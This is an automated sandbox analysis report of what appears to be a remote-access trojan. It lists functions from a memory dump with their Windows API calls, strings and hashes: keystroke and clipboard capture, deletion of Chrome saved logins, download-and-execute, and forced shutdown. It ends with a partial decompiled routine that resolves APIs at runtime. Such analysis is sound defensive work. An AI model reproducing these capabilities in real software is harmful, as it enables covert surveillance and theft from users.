                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                    • String ID:
                                    • API String ID: 2247270020-0
                                    • Opcode ID: e7f1910964228cafa681e1d42106b10da712081a50ccea6bdad9e05a9e19eac6
                                    • Instruction ID: cdca74bb109347866b30327f1a69394510d435af2df395bb09da674e29540040
                                    • Opcode Fuzzy Hash: e7f1910964228cafa681e1d42106b10da712081a50ccea6bdad9e05a9e19eac6
                                    • Instruction Fuzzy Hash: AE813C71D00159ABCB14EBE0EC96DEEB77AEF24350F10801AF91666291EF746F09CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E7754, Relevance: 13.6, APIs: 9, Instructions: 147fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,?,?,0073C238), ref: 006E77EB
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,0073C238), ref: 006E7822
                                    • RemoveDirectoryW.KERNEL32(?,?,?,0073C238), ref: 006E789C
                                    • FindClose.KERNEL32(00000000,?,?,0073C238), ref: 006E78CA
                                    • RemoveDirectoryW.KERNEL32(?,?,?,0073C238), ref: 006E78D3
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,0073C238), ref: 006E78F0
                                    • DeleteFileW.KERNEL32(?,?,?,0073C238), ref: 006E78FD
                                    • GetLastError.KERNEL32(?,?,0073C238), ref: 006E7925
                                    • FindClose.KERNEL32(00000000,?,?,0073C238), ref: 006E7938
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 2341273852-0
                                    • Opcode ID: 2b13fce96163c89ee04adefccb841daa720a63ecc76f8753903e954fe767f27a
                                    • Instruction ID: 93f8f0d7464886d66c7bed0485ec304c6bb9aedcdb836d0263587fdc31152303
                                    • Opcode Fuzzy Hash: 2b13fce96163c89ee04adefccb841daa720a63ecc76f8753903e954fe767f27a
                                    • Instruction Fuzzy Hash: DC51183450539A8ACF34DF69C8886FAB3B6BF54304F5081ADD84993251FB355E87CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E1205, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 479registrylibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 006E12DA
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 006E12E6
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 006E15C7
                                    • GetProcAddress.KERNEL32(00000000), ref: 006E15CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                    • API String ID: 2127411465-314212984
                                    • Opcode ID: d3778eda6449d1dbdbc26860f52795b99df4e930561e31e8aec3c7bc4bcebea9
                                    • Instruction ID: a29cbad5585528cb4df79429224e580b980d7cf0415c67be13e6ced91d5a1c10
                                    • Opcode Fuzzy Hash: d3778eda6449d1dbdbc26860f52795b99df4e930561e31e8aec3c7bc4bcebea9
                                    • Instruction Fuzzy Hash: A9E1A572E0430067CA94BBB58C6797E77AB5F96700F40051EF942AF3D3EE758A0487A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E2BE1, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006E3958: GetCurrentProcess.KERNEL32(00000028,?), ref: 006E3965
                                      • Part of subcall function 006E3958: OpenProcessToken.ADVAPI32(00000000), ref: 006E396C
                                      • Part of subcall function 006E3958: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 006E397E
                                      • Part of subcall function 006E3958: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 006E399D
                                      • Part of subcall function 006E3958: GetLastError.KERNEL32 ref: 006E39A3
                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 006E2C83
                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 006E2C98
                                    • GetProcAddress.KERNEL32(00000000), ref: 006E2C9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                    • String ID: 8Em$PowrProf.dll$SetSuspendState
                                    • API String ID: 1589313981-3192512550
                                    • Opcode ID: 82fd8d315e980de0ee51e55ee54bccdb49a5f3afb60916efa99cf53656f84eef
                                    • Instruction ID: cc8ff5b3fa9799e29be7e136576cee55b5999a039840f34009e5d75cf45a603b
                                    • Opcode Fuzzy Hash: 82fd8d315e980de0ee51e55ee54bccdb49a5f3afb60916efa99cf53656f84eef
                                    • Instruction Fuzzy Hash: 3E21AC60E04351A7CB94FBF198669AE638F9B45700F14092EB5425F3C3DEB8CD058265
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D9EF4, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 006D9F30
                                    • GetLastError.KERNEL32 ref: 006D9F3A
                                    Strings
                                    • UserProfile, xrefs: 006D9F00
                                    • [Chrome StoredLogins found, cleared!], xrefs: 006D9F60
                                    • [Chrome StoredLogins not found], xrefs: 006D9F54
                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 006D9EFB
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    • API String ID: 2018770650-1062637481
                                    • Opcode ID: e2ff3386cae99619f3c46963b47319da64ef0d749544b1ca4bfeff961d877cd4
                                    • Instruction ID: 901350741c8ce888c9f8d9cabf07b28129194a3df5f06f6c093b0b8428053f14
                                    • Opcode Fuzzy Hash: e2ff3386cae99619f3c46963b47319da64ef0d749544b1ca4bfeff961d877cd4
                                    • Instruction Fuzzy Hash: A801F971F80109AB8A48B7B4ED5B8FE7766A912300740022FF406963D2FE554A45C6E6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E3958, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 006E3965
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 006E396C
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 006E397E
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 006E399D
                                    • GetLastError.KERNEL32 ref: 006E39A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3534403312-3733053543
                                    • Opcode ID: 9ae4611fad492f8565a08bd3aaf97e8cdb2aa408b2b79e1792e40208bad7b246
                                    • Instruction ID: d22d5c6133e768f0664780c714a4204bd9f7e8db4f4fe3fba1c4daf12c279be3
                                    • Opcode Fuzzy Hash: 9ae4611fad492f8565a08bd3aaf97e8cdb2aa408b2b79e1792e40208bad7b246
                                    • Instruction Fuzzy Hash: 91F034B1902129ABEB20ABA0ED0DEEFBFBCEF05711F104054B909A1050D63C4B05CAB5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D77EC, Relevance: 9.3, APIs: 6, Instructions: 324fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 006D77F1
                                      • Part of subcall function 006D4A08: connect.WS2_32(?,0073DBA0,00000010), ref: 006D4A23
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006D789E
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 006D78FC
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006D7954
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 006D796B
                                      • Part of subcall function 006D4E0B: closesocket.WS2_32(?), ref: 006D4E11
                                    • FindClose.KERNEL32(00000000), ref: 006D7BA9
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
                                    • String ID:
                                    • API String ID: 2104358809-0
                                    • Opcode ID: 5b64e61390a8c4c46fc41ec1a9db207dbcdc693e27fa2f9c7239eca5f3607038
                                    • Instruction ID: 763d590ecb7486e9a8ed1f686396303f9dee23cf1fab10a54a6e9016f802ff9b
                                    • Opcode Fuzzy Hash: 5b64e61390a8c4c46fc41ec1a9db207dbcdc693e27fa2f9c7239eca5f3607038
                                    • Instruction Fuzzy Hash: 6AC18032D041099BCB54EB60DC92AEDB377AF21310F50416FE816AB292EF345F49CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D89BA, Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,?,00000000), ref: 006D89EE
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 006D89F9
                                    • GetKeyboardLayout.USER32(00000000), ref: 006D8A00
                                    • GetKeyState.USER32(00000010), ref: 006D8A0A
                                    • GetKeyboardState.USER32(?), ref: 006D8A17
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 006D8A33
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                    • String ID:
                                    • API String ID: 3566172867-0
                                    • Opcode ID: 8b5d2bd8208ebb86c830cd9ce3b7cb6987b551869880db3b17cf28eab5d57b87
                                    • Instruction ID: 21a94e68a707af27fe831e3f4583d43a210eb83ab05151937b2937f59ad2ad6c
                                    • Opcode Fuzzy Hash: 8b5d2bd8208ebb86c830cd9ce3b7cb6987b551869880db3b17cf28eab5d57b87
                                    • Instruction Fuzzy Hash: 0D11127290020CBBDB10DBE4DC49FEA7BBCEB0C741F104455FA04E6191DA79AF558BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DD0B5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006E0885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 006E08A5
                                      • Part of subcall function 006E0885: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 006E08C3
                                      • Part of subcall function 006E0885: RegCloseKey.ADVAPI32(?), ref: 006E08CE
                                    • Sleep.KERNEL32(00000BB8), ref: 006DD169
                                    • ExitProcess.KERNEL32 ref: 006DD1DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 3.2.1 Pro$override$pth_unenc
                                    • API String ID: 2281282204-2083519672
                                    • Opcode ID: 41c8b4028211eec73bfbe31592068e23f83bf734a93b6d79986fcb5d48d1d8f5
                                    • Instruction ID: 7506732f099edf6cd01bc9ac4f0adde27f272f8cabbb1f5eeded703b5ab99590
                                    • Opcode Fuzzy Hash: 41c8b4028211eec73bfbe31592068e23f83bf734a93b6d79986fcb5d48d1d8f5
                                    • Instruction Fuzzy Hash: A221F471F443407BEA88B6B94C27A6E3297AB85700F40041DB8019B3C7FDAA9A1187DB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0071A6BC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0071A9DB,?,00000000), ref: 0071A755
                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0071A9DB,?,00000000), ref: 0071A77E
                                    • GetACP.KERNEL32(?,?,0071A9DB,?,00000000), ref: 0071A793
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP
                                    • API String ID: 2299586839-711371036
                                    • Opcode ID: 8829127069829674c66c8ddf23018c8e2cb7a1a868980baef454955ca464a08c
                                    • Instruction ID: 0934ebd3b95233820b9b14ce89bfb7d575979d647b1e2088d9ab0df69c7afbc4
                                    • Opcode Fuzzy Hash: 8829127069829674c66c8ddf23018c8e2cb7a1a868980baef454955ca464a08c
                                    • Instruction Fuzzy Hash: C021A735602205B6E7318F2CC901AE773B6AF54B64B568424E909D71D1E73ADFC1C391
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E6C39, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                    Download Yara Rule
                                    APIs
                                    • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 006E6C4A
                                    • LoadResource.KERNEL32(00000000,?,?,?,006DCC70), ref: 006E6C5E
                                    • LockResource.KERNEL32(00000000,?,?,?,006DCC70), ref: 006E6C65
                                    • SizeofResource.KERNEL32(00000000,?,?,?,006DCC70), ref: 006E6C74
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SETTINGS
                                    • API String ID: 3473537107-594951305
                                    • Opcode ID: 8ea07559b9d574461e87728985cdeb94ae6b2e263848d839edb6475440feb15d
                                    • Instruction ID: 3788c5dae44820f3ab19f11992342beb488982d3efb1ecfb3ffe51526eedb4e7
                                    • Opcode Fuzzy Hash: 8ea07559b9d574461e87728985cdeb94ae6b2e263848d839edb6475440feb15d
                                    • Instruction Fuzzy Hash: 33E01A76700798ABE7311BA5AC4CD163E79EFCAB637008025F60186220D73E8861DB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D7C55, Relevance: 7.7, APIs: 5, Instructions: 246fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 006D7C5A
                                      • Part of subcall function 006D7514: char_traits.LIBCPMT ref: 006D752F
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 006D7CD2
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006D7CFB
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 006D7D12
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstH_prologNextchar_traits
                                    • String ID:
                                    • API String ID: 3260228402-0
                                    • Opcode ID: 306ba57029b87dfe421f8076bd4442542e06fbb4eab07e96eedde3c54f7ba598
                                    • Instruction ID: cbf8516d5b619695f1c5ed23c89389515d71925e20d61e08906160760c4ca344
                                    • Opcode Fuzzy Hash: 306ba57029b87dfe421f8076bd4442542e06fbb4eab07e96eedde3c54f7ba598
                                    • Instruction Fuzzy Hash: 7A916F32D041199BCB55EBA0DC929EDB37BAF21340F14426FE806AB291EF309F45CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0071A890, Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00711CE2: GetLastError.KERNEL32(00000000,?,00705545,?,?,?,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711CE6
                                      • Part of subcall function 00711CE2: _free.LIBCMT ref: 00711D19
                                      • Part of subcall function 00711CE2: SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D5A
                                      • Part of subcall function 00711CE2: _abort.LIBCMT ref: 00711D60
                                      • Part of subcall function 00711CE2: _free.LIBCMT ref: 00711D41
                                      • Part of subcall function 00711CE2: SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D4E
                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0071A99C
                                    • IsValidCodePage.KERNEL32(00000000), ref: 0071A9F7
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0071AA06
                                    • GetLocaleInfoW.KERNEL32(?,00001001,0070E2C1,00000040,?,0070E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0071AA4E
                                    • GetLocaleInfoW.KERNEL32(?,00001002,0070E341,00000040), ref: 0071AA6D
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                    • String ID:
                                    • API String ID: 745075371-0
                                    • Opcode ID: bc72af64490d69a1db526f524c955ce0dc1d62fc58e4109737ed87ec9732a970
                                    • Instruction ID: ddaa735aeba51d9f6e488683813c7aeb5910ddff56bc252ee399d77e5d6b384b
                                    • Opcode Fuzzy Hash: bc72af64490d69a1db526f524c955ce0dc1d62fc58e4109737ed87ec9732a970
                                    • Instruction Fuzzy Hash: 33515171901209BBDB20DFA9CC45AFE77B8BF44700F154465E954E71D0D778AAC0CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070FA50, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: gq$gq
                                    • API String ID: 0-3320374895
                                    • Opcode ID: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
                                    • Instruction ID: 557bce826c6048aae8f2da4e598ce5a3e6608e6b8b48214b3f4d82ab5584a33c
                                    • Opcode Fuzzy Hash: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
                                    • Instruction Fuzzy Hash: C8023D71E00219DFDF24CFA9C8906AEB7F1FF88314F25826AD819E7781D734A9418B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E7F10, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 006E8005
                                      • Part of subcall function 006E0AA7: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 006E0AB6
                                      • Part of subcall function 006E0AA7: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,006E0CCD,?,00000000), ref: 006E0ADE
                                      • Part of subcall function 006E0AA7: RegCloseKey.ADVAPI32(00000000,?,?,?,006E0CCD,?,00000000), ref: 006E0AE9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateInfoParametersSystemValue
                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                    • API String ID: 4127273184-3576401099
                                    • Opcode ID: b78181150bf0b53a9685405e90f023100db67670482a569c8a46d8b1b14cc4b3
                                    • Instruction ID: 7322765c2da0426427ed23a6b5379ddab6c2c6372a4b564ab54f4693267bdc7e
                                    • Opcode Fuzzy Hash: b78181150bf0b53a9685405e90f023100db67670482a569c8a46d8b1b14cc4b3
                                    • Instruction Fuzzy Hash: 5B117262B8579673F918303E4D67FAE2827D756B64F600178F6022F7C6E8CB4A4142E6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00719F58, Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00711CE2: GetLastError.KERNEL32(00000000,?,00705545,?,?,?,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711CE6
                                      • Part of subcall function 00711CE2: _free.LIBCMT ref: 00711D19
                                      • Part of subcall function 00711CE2: SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D5A
                                      • Part of subcall function 00711CE2: _abort.LIBCMT ref: 00711D60
                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0070E2C8,?,?,?,?,0070DD1F,?,00000004), ref: 0071A03A
                                    • _wcschr.LIBVCRUNTIME ref: 0071A0CA
                                    • _wcschr.LIBVCRUNTIME ref: 0071A0D8
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0070E2C8,00000000,0070E3E8), ref: 0071A17B
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                    • String ID:
                                    • API String ID: 4212172061-0
                                    • Opcode ID: 4554fbd6b02628724a554097ff846e5945bbd5ad19e9c2ec1ecb9241ed0ff899
                                    • Instruction ID: 56b0a3ba0ce87e5384146740df6b74e5ecc6070ba3cc7bf430b23a06ff391131
                                    • Opcode Fuzzy Hash: 4554fbd6b02628724a554097ff846e5945bbd5ad19e9c2ec1ecb9241ed0ff899
                                    • Instruction Fuzzy Hash: F761D772601706FAD724AB78CC9AAE673ACEF04710F14442AFA05D71C1EB7CE986D761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D5C8B, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226filenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 006D5DA3
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 006D5E87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadExecuteFileShell
                                    • String ID: open
                                    • API String ID: 2825088817-2758837156
                                    • Opcode ID: 1896e7b0cd53f1aaf68b3d6da77e13c9780422f1e097ae9c5d905eca22cbe45d
                                    • Instruction ID: 8591b5ae4641d505681e854576471e8270b25ece323938e643ce5c6982e7a8a2
                                    • Opcode Fuzzy Hash: 1896e7b0cd53f1aaf68b3d6da77e13c9780422f1e097ae9c5d905eca22cbe45d
                                    • Instruction Fuzzy Hash: 3061F871E0430067CB54FBB5D8669BE73AB9F96300F00092FF8475F7D2EE648A098256
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D9BD9, Relevance: 4.5, APIs: 3, Instructions: 22clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32 ref: 006D9BDF
                                    • GetClipboardData.USER32 ref: 006D9BEB
                                    • CloseClipboard.USER32(?,006D9C74,006D92D9,?,00000000,00000000), ref: 006D9BF3
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseDataOpen
                                    • String ID:
                                    • API String ID: 2058664381-0
                                    • Opcode ID: 757618872f279e080d543849b853aa36d534f6472d970c95da5ba60b7fcd6155
                                    • Instruction ID: cdc42f084abb4dab6eaa6331215d48d232d1b82bf6ce1c9ecbf511ccde0f71b4
                                    • Opcode Fuzzy Hash: 757618872f279e080d543849b853aa36d534f6472d970c95da5ba60b7fcd6155
                                    • Instruction Fuzzy Hash: D4E08671A44214ABC720EBA2EC09B997B95AB04B91F054026F9099A351DE789A01C6F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006FF9B4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006FF9CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-3916222277
                                    • Opcode ID: 7c682331735c43932f20384225cec83bc9866ce933ee63d7c38537894702b785
                                    • Instruction ID: 9df64bcfbb1b5083fe800866f05c9eae4a85c48c19e0c86828a49adeb0d345b1
                                    • Opcode Fuzzy Hash: 7c682331735c43932f20384225cec83bc9866ce933ee63d7c38537894702b785
                                    • Instruction Fuzzy Hash: 9141BD71A00209EBEB18CF69D9867AABBF4FB48315F20C53AD549E7354E3789940CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DCD09, Relevance: 82.3, APIs: 28, Strings: 19, Instructions: 98libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E006DCD09() {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t2 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExA");
				 *0x73bd2c = _t2;
				if(_t2 == 0) {
					 *0x73bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x73bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x73bd2c == 0) {
					 *0x73bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x73bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x73bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x73beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x73beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
